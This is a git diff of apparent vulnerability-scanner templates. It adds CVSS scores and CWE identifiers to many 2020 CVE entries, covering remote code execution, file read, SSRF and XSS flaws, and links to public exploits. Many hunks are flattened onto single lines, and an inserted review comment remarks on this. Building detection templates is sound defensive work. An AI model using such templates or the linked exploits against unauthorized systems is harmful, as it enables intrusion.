     vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
   tags: cve,cve2020,vbulletin,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-17496
+    cwe-id: CWE-74
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-17505.yaml b/cves/2020/CVE-2020-17505.yaml
index c98ea1fe16..6e0d00f86d 100644
--- a/cves/2020/CVE-2020-17505.yaml
+++ b/cves/2020/CVE-2020-17505.yaml
@@ -7,6 +7,11 @@ info:
   description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
   tags: cve,cve2020,rce
   reference: https://blog.max0x4141.com/post/artica_proxy/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.80
+    cve-id: CVE-2020-17505
+    cwe-id: CWE-78
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-17506.yaml b/cves/2020/CVE-2020-17506.yaml
index f22e184fd5..bc3ee60d1e 100644
--- a/cves/2020/CVE-2020-17506.yaml
+++ b/cves/2020/CVE-2020-17506.yaml
@@ -7,6 +7,11 @@ info: description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php. tags: cve,cve2020 reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-17506 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-17518.yaml b/cves/2020/CVE-2020-17518.yaml index 8e59416072..86ff4d8977 100644 --- a/cves/2020/CVE-2020-17518.yaml +++ b/cves/2020/CVE-2020-17518.yaml @@ -3,12 +3,17 @@ id: CVE-2020-17518 info: name: Apache Flink Upload Path Traversal author: pdteam - severity: critical + severity: high reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 description: | Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP HEADER. tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17518 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2020/CVE-2020-17519.yaml b/cves/2020/CVE-2020-17519.yaml index f1c9a162b0..5e386eed1f 100644 --- a/cves/2020/CVE-2020-17519.yaml +++ b/cves/2020/CVE-2020-17519.yaml @@ -7,6 +7,11 @@ info: description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. reference: https://github.com/B1anda0/CVE-2020-17519 tags: cve,cve2020,apache,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17519 + cwe-id: CWE-552 requests: - method: GET 
diff --git a/cves/2020/CVE-2020-17530.yaml b/cves/2020/CVE-2020-17530.yaml
index fbae086491..3e281da466 100644
--- a/cves/2020/CVE-2020-17530.yaml
+++ b/cves/2020/CVE-2020-17530.yaml
@@ -12,6 +12,11 @@ info:
   tags: cve,cve2020,apache,rce,struts
   description: |
     Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-17530
+    cwe-id: CWE-917
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-1938.yaml b/cves/2020/CVE-2020-1938.yaml
index 14c505aa53..e142920541 100644
--- a/cves/2020/CVE-2020-1938.yaml
+++ b/cves/2020/CVE-2020-1938.yaml
@@ -3,9 +3,15 @@ id: CVE-2020-1938 info: name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability author: milo2012 - severity: high + severity: critical reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 tags: cve,cve2020,apache,tomcat,lfi,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-1938 + cwe-id: CWE-269 + description: "When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. 
A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations." network: - inputs: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 021fb3e887..acc8e77e77 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -8,6 +8,11 @@ info: tags: cve,cve2020,apache,xss reference: - https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-1943 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-19625.yaml b/cves/2020/CVE-2020-19625.yaml index 2a6dce0689..ba85b67fc6 100644 --- a/cves/2020/CVE-2020-19625.yaml +++ b/cves/2020/CVE-2020-19625.yaml @@ -4,8 +4,12 @@ info: author: geeknik description: Remote Code Execution vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter. reference: https://github.com/oria/gridx/issues/433 - severity: high + severity: critical tags: cve,cve2020,gridx,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-19625 requests: - method: GET diff --git a/cves/2020/CVE-2020-2036.yaml b/cves/2020/CVE-2020-2036.yaml index 707e6c5343..aaf9f7972d 100644 --- a/cves/2020/CVE-2020-2036.yaml +++ b/cves/2020/CVE-2020-2036.yaml 
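Review bot: The `description` added for CVE-2020-1938 is a single double-quoted scalar that is broken across two physical lines in this diff and embeds a bullet list inline (`- returning arbitrary files ...`, `- processing any file ...`). If the hunk was really authored with that break, the continuation line appears to carry no `+` marker and the patch would not apply cleanly; if the break is only an artifact of how the diff was captured, the value is still far too long to review in one line. A `description: |` block scalar with each sentence and each bullet on its own line would remove both problems and needs no quoting; the same block-scalar form would suit the long descriptions added for CVE-2020-13927 and CVE-2020-15148.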
@@ -2,11 +2,16 @@ id: CVE-2020-2036 info: name: Palo Alto Networks Reflected XSS author: madrobot - severity: medium + severity: high description: > A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ tags: cve,cve2020,vpn,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-2036 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-2096.yaml b/cves/2020/CVE-2020-2096.yaml index 7a5e9b010c..b6c161b850 100644 --- a/cves/2020/CVE-2020-2096.yaml +++ b/cves/2020/CVE-2020-2096.yaml @@ -10,6 +10,11 @@ info: - http://www.openwall.com/lists/oss-security/2020/01/15/1 - http://packetstormsecurity.com/files/155967/Jenkins-Gitlab-Hook-1.4.2-Cross-Site-Scripting.html tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2096 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml index e85004b3b3..4b25b87e1f 100644 --- a/cves/2020/CVE-2020-21224.yaml +++ b/cves/2020/CVE-2020-21224.yaml 
@@ -7,6 +7,11 @@ info: description: A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul tags: cve,cve2020,clusterengine,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-21224 + cwe-id: CWE-88 requests: - method: POST diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml index 69eb751280..54be67bdf5 100644 --- a/cves/2020/CVE-2020-2140.yaml +++ b/cves/2020/CVE-2020-2140.yaml @@ -6,6 +6,11 @@ info: description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability. reference: https://www.jenkins.io/security/advisory/2020-03-09/ tags: cve,cve2020,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-2140 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml index 69ef50972f..24f34dd46a 100644 --- a/cves/2020/CVE-2020-22840.yaml +++ b/cves/2020/CVE-2020-22840.yaml 
@@ -3,9 +3,18 @@ id: CVE-2020-22840 info: name: b2evolution CMS Open redirect author: geeknik - severity: low + severity: medium description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php. tags: cve,cve2020,redirect,b2evolution + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-22840 + cwe-id: CWE-601 + reference: + - https://github.com/b2evolution/b2evolution/issues/102 + - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html + - https://www.exploit-db.com/exploits/49554 requests: - method: GET diff --git a/cves/2020/CVE-2020-23517.yaml b/cves/2020/CVE-2020-23517.yaml index 7430e804ef..ddd98b74b9 100644 --- a/cves/2020/CVE-2020-23517.yaml +++ b/cves/2020/CVE-2020-23517.yaml @@ -7,6 +7,11 @@ info: description: XSS vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm. reference: https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html tags: xss,cve,cve2020 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-23517 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-23972.yaml b/cves/2020/CVE-2020-23972.yaml index 5270160681..af1319821d 100644 --- a/cves/2020/CVE-2020-23972.yaml +++ b/cves/2020/CVE-2020-23972.yaml @@ -11,6 +11,11 @@ info: bypassed by changing Content-Type & name file too double ext. reference: https://www.exploit-db.com/exploits/49129 tags: cve,cve2020,joomla + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-23972 + cwe-id: CWE-434 requests: - raw: 
diff --git a/cves/2020/CVE-2020-24148.yaml b/cves/2020/CVE-2020-24148.yaml index 6723ab0df4..7b3b0a8eb0 100644 --- a/cves/2020/CVE-2020-24148.yaml +++ b/cves/2020/CVE-2020-24148.yaml @@ -9,6 +9,11 @@ info: description: | Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed) plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H + cvss-score: 9.10 + cve-id: CVE-2020-24148 + cwe-id: CWE-918 requests: - method: POST diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml index 13d8570a5b..20c73cd80d 100644 --- a/cves/2020/CVE-2020-24186.yaml +++ b/cves/2020/CVE-2020-24186.yaml @@ -7,6 +7,11 @@ info: description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md tags: cve,cve2020,wordpress,wp-plugin,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml index e5674758dd..6c887b906a 100644 --- a/cves/2020/CVE-2020-24223.yaml +++ b/cves/2020/CVE-2020-24223.yaml @@ -10,6 +10,11 @@ info: - https://sourceforge.net/projects/maracms/ # vendor homepage - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link tags: cve,cve2020,mara,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24223 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-24312.yaml b/cves/2020/CVE-2020-24312.yaml index ce90bb4046..8bd38792df 100644 --- a/cves/2020/CVE-2020-24312.yaml 
+++ b/cves/2020/CVE-2020-24312.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2020,wordpress,backups # Note: Manually check content + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24312 + cwe-id: CWE-552 requests: - method: GET diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml index c85f31a04e..7634783769 100644 --- a/cves/2020/CVE-2020-24550.yaml +++ b/cves/2020/CVE-2020-24550.yaml @@ -7,6 +7,11 @@ info: description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. tags: cve,cve2020,redirect,episerver reference: https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-24550 + cwe-id: CWE-601 requests: - method: GET diff --git a/cves/2020/CVE-2020-24571.yaml b/cves/2020/CVE-2020-24571.yaml index 3e8f391472..7ac3c519d7 100644 --- a/cves/2020/CVE-2020-24571.yaml +++ b/cves/2020/CVE-2020-24571.yaml @@ -6,6 +6,11 @@ info: description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal. reference: https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371 tags: cve,cve2020,nexusdb,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-24571 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml index 24b6fd03d9..b998f77f13 100644 --- a/cves/2020/CVE-2020-24579.yaml +++ b/cves/2020/CVE-2020-24579.yaml 
@@ -3,10 +3,15 @@ id: CVE-2020-24579 info: name: DLINK DSL 2888a RCE author: pikpikcu - severity: medium + severity: high description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality. reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/ tags: cve,cve2020,dlink,rce + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24579 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml index 9b973fef67..58d1536129 100644 --- a/cves/2020/CVE-2020-24949.yaml +++ b/cves/2020/CVE-2020-24949.yaml @@ -7,6 +7,10 @@ info: description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt tags: cve,cve2020,phpfusion,rce,php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-24949 requests: - method: GET diff --git a/cves/2020/CVE-2020-25078.yaml b/cves/2020/CVE-2020-25078.yaml index 1789b5371c..7f8a7cfa59 100644 --- a/cves/2020/CVE-2020-25078.yaml +++ b/cves/2020/CVE-2020-25078.yaml @@ -7,6 +7,10 @@ info: description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25078 tags: cve,cve2020,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25078 requests: 
diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index f2553035ef..67e680d764 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -12,6 +12,11 @@ info: # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25213 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml index 21cf8027b4..adcb65ac0a 100644 --- a/cves/2020/CVE-2020-25223.yaml +++ b/cves/2020/CVE-2020-25223.yaml @@ -8,6 +8,10 @@ info: reference: - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223 tags: cve,cve2020,sophos,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25223 requests: - raw: diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml index a60c97dbea..5a82ebb9c1 100644 --- a/cves/2020/CVE-2020-25495.yaml +++ b/cves/2020/CVE-2020-25495.yaml @@ -7,6 +7,11 @@ info: severity: medium tags: cve,cve2020,sco,xss reference: https://www.exploit-db.com/exploits/49300 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-25495 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-25506.yaml b/cves/2020/CVE-2020-25506.yaml index d2352c64ac..2ee12a9f60 100644 --- a/cves/2020/CVE-2020-25506.yaml +++ b/cves/2020/CVE-2020-25506.yaml @@ -9,6 +9,11 @@ info: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,dlink,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-25506 + cwe-id: CWE-78 requests: - raw: 
diff --git a/cves/2020/CVE-2020-2551.yaml b/cves/2020/CVE-2020-2551.yaml index c861f6b44a..348fd0ba52 100644 --- a/cves/2020/CVE-2020-2551.yaml +++ b/cves/2020/CVE-2020-2551.yaml @@ -19,6 +19,10 @@ info: reference: https://github.com/hktalent/CVE-2020-2551 tags: cve,cve2020,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-2551 requests: - method: GET diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index 822c9f5ef4..2ff12bd0ef 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -3,10 +3,15 @@ info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik - severity: medium + severity: high description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. reference: https://www.exploit-db.com/exploits/48812 tags: cve,cve2020,thinkadmin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-25540 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-26153.yaml b/cves/2020/CVE-2020-26153.yaml index fb40209d26..7a0433f16c 100644 --- a/cves/2020/CVE-2020-26153.yaml +++ b/cves/2020/CVE-2020-26153.yaml @@ -10,6 +10,11 @@ info: - https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/ - https://nvd.nist.gov/vuln/detail/CVE-2020-26153 tags: cve,cve2020,xss,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-26153 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index d3d76d844b..0ebba2ba0c 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml 
@@ -11,6 +11,11 @@ info: - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ tags: cve,cve2020,alerta + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26214 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index b9efcf09b6..18174b37ea 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -9,6 +9,10 @@ info: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ tags: cve,cve2020,netgear,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26919 requests: - raw: diff --git a/cves/2020/CVE-2020-26948.yaml b/cves/2020/CVE-2020-26948.yaml index 54d281ece9..6367027877 100644 --- a/cves/2020/CVE-2020-26948.yaml +++ b/cves/2020/CVE-2020-26948.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/btnz-k/emby_ssrf description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter. tags: cve,cve2020,emby,jellyfin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-26948 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2020/CVE-2020-27361.yaml b/cves/2020/CVE-2020-27361.yaml index cc00677a99..800de254e4 100644 --- a/cves/2020/CVE-2020-27361.yaml +++ b/cves/2020/CVE-2020-27361.yaml 
@@ -7,6 +7,11 @@ info: description: An issue exists within Akkadian Provisioning Manager 4.50.02 which allows attackers to view sensitive information within the /pme subdirectories. reference: https://www.blacklanternsecurity.com/2021-07-01-Akkadian-CVE/ tags: cve,cve2020,akkadian,listing,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27361 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-27735.yaml b/cves/2020/CVE-2020-27735.yaml index 31b0f18651..dc84ec8031 100644 --- a/cves/2020/CVE-2020-27735.yaml +++ b/cves/2020/CVE-2020-27735.yaml @@ -8,6 +8,11 @@ info: An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-27735 tags: cve,cve2020,xss,wing-ftp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27735 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27866.yaml b/cves/2020/CVE-2020-27866.yaml index cc13503b5f..81151b66a4 100644 --- a/cves/2020/CVE-2020-27866.yaml +++ b/cves/2020/CVE-2020-27866.yaml @@ -11,6 +11,11 @@ info: - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866 - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-27866 + cwe-id: CWE-288 requests: - raw: diff --git a/cves/2020/CVE-2020-27982.yaml b/cves/2020/CVE-2020-27982.yaml index 91159315d6..f46b932a44 100644 --- a/cves/2020/CVE-2020-27982.yaml +++ b/cves/2020/CVE-2020-27982.yaml 
@@ -6,6 +6,11 @@ info: description: IceWarp 11.4.5.0 allows XSS via the language parameter. reference: https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html tags: cve,cve2020,xss,icewarp + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-27982 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-27986.yaml b/cves/2020/CVE-2020-27986.yaml index dcb73a8bf5..d33b9d2de3 100644 --- a/cves/2020/CVE-2020-27986.yaml +++ b/cves/2020/CVE-2020-27986.yaml @@ -3,13 +3,18 @@ id: CVE-2020-27986 info: name: SonarQube unauth author: pikpikcu - severity: medium + severity: high description: | SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it." reference: https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/ tags: cve,cve2020,sonarqube + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-27986 + cwe-id: CWE-306,CWE-312 requests: - method: GET diff --git a/cves/2020/CVE-2020-28188.yaml b/cves/2020/CVE-2020-28188.yaml index e511013c53..45c1ee460a 100644 --- a/cves/2020/CVE-2020-28188.yaml +++ b/cves/2020/CVE-2020-28188.yaml @@ -10,6 +10,11 @@ info: - https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html - 